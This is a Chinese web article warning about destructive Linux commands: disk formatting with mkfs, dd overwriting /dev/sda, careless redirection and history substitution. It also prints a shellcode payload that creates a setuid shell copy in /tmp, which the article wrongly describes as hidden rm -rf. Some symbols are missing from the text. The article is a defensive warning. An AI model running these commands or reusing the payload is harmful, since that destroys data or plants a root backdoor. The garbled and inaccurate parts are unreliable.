极度危险的linux命令 linux危险端口( 三 )


6. mkfs.ext3 /dev/sda
上列命令会格式化块设备‘sda’ , 你无疑知道在执行上列命令后你的块设备(硬盘驱 动器)会被格式化 , 崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段 。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设 备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用 。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁 灭性的,上面的数据都会被蒸发了 。)
7.file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出 。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了 。另外,我想你可能真正想用的是 “”,即累加新的输出到文件,而不是刷新那个文件 。) 。如果用上列执行时输入错误或无知的输入类似 “xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件 。
8. ^foo^bar
这个命令在“鲜为人知而又实用的 Linux 命令大全:”中描述过,用来编辑先前运行的命令而无需重打整个命令 。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦 。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧 。)
9. dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据 。当然!你的系统可能陷入混乱和不可恢复的状态 。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次 。)
10. 隐藏命令
下面的命令其实就是上面第一个命令 (rm -rf) 。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄 。在终端里运行下面命令可能会擦除你的根分区 。
这个命令表明通常真正的危险是隐藏的 , 不会被轻易的检测到 。你必须时刻留心你在做什么结果会怎样 。不要编译/运行从未知来源的代码 。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令,因为这将导致数据丢失或者系统崩溃 。如果你想测试它们,请在虚拟机上运行 。
;
linux kill命令极度危险的linux命令你可以把kill文件移动到你root用户极度危险的linux命令的家目录 。
方法:
1.which kill查看kill文件的位置/bin/kill
2.cd /root
3.mkdir bin因为每个用户的家目录里的bin目录是系统默认设置的环境变量 echo $PATH可以看到
4.mv /bin/kill /root/bin 你的root用户可以执行kill命令 , 但其极度危险的linux命令他用户无法访问/root目录下的文件
你可以搜索家目录bin文件夹的作用
关于极度危险的linux命令和linux危险端口的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站 。

推荐阅读